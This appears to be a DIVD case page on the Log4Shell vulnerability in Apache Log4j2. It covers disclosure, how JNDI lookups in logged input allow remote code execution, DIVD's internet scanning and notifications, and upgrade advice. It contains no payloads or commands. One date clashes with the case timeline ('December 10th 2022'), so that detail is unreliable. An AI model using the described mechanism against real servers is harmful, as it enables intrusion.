CASE: APACHE LOG4J2

Written on 05 Apr 2022 by Gerard Janssen, updated on 09 Dec 2024 by Serena de Pater

The case

On Thursday, December 9th 2021, Twitter user Lunasec (@P0rZ9) wrote a cryptic tweet:

‘Apache Log4j2 jndi RCE’

The tweet suggested Lunasec could take control of version 2 of Log4j, java’s logging library. Log4j is an open-source Java Library and one of the most popular Java logging frameworks. It is a project of the Apache Software Foundation (ASF), a non-profit organization. The same day the tweet appeared, a proof of concept of the exploit was published on GitHub.

The exploit

The exploit functions in the following way: a vulnerable Log4j server logs a payload that an attacker has crafted. This action can trigger the server, through JNDI (Java Naming and Directory Interface), to request a server controlled by the attacker, allowing for the execution of an additional payload. The attack can be carried out in various ways, such as through HTTP requests, SMS messages, emails, or even by using fields that can be manipulated by users—essentially, anything that ends up being logged. With the right message in the log, an attacker could initiate an unauthenticated Remote Code Execution (RCE).

The impact

The news caused shockwaves in the information security community. The impact of the vulnerability and the ease with which it could be exploited made the possible impact enormous. Log4j is ubiquitous and present in a whole range of software. In a lot of cases, the developers don’t even know they are using it. ‘It is like sugar: present in your meals, even when you didn’t know,’ said DIVD researcher Frank Breedijk. The vulnerability has been dubbed Log4Shell, to which Apache assigned CVE-2021-44228. It turned out that the vulnerability was already discovered on November 24th, by the Alibaba cloud security team which reported it to Apache.

What we did

Since December 10th 2022, multiple researchers from DIVD have been working around the clock to search for vulnerable servers. Most spent an average of 16 hours per day, working on methodologies to scan the internet for this vulnerability, and warning users of vulnerable software. DIVD notified more than 3,500 users worldwide who were possibly vulnerable and got a notification email with advice to upgrade to patched version 2.16.0. DIVD cooperated with DTACT in building a scanner and also helped the Dutch NCSC with compiling a list of software vulnerable to log4shell. The case was officially closed on the 5th of April, 2022.

What you can do

If you run Apache with version less then 2.0 or Apache and/or log4j2 less then 2.15.0-rc1 upgrade to version 2.17.1 as soon as possible.

More information

• Lunasec Advisory
• Tweet Lunasec
• DIVD article
• DIVD-2021-00038
• POC Github
• DIVD DTACT log4j-scanner
• NCSC list of vulnerable applications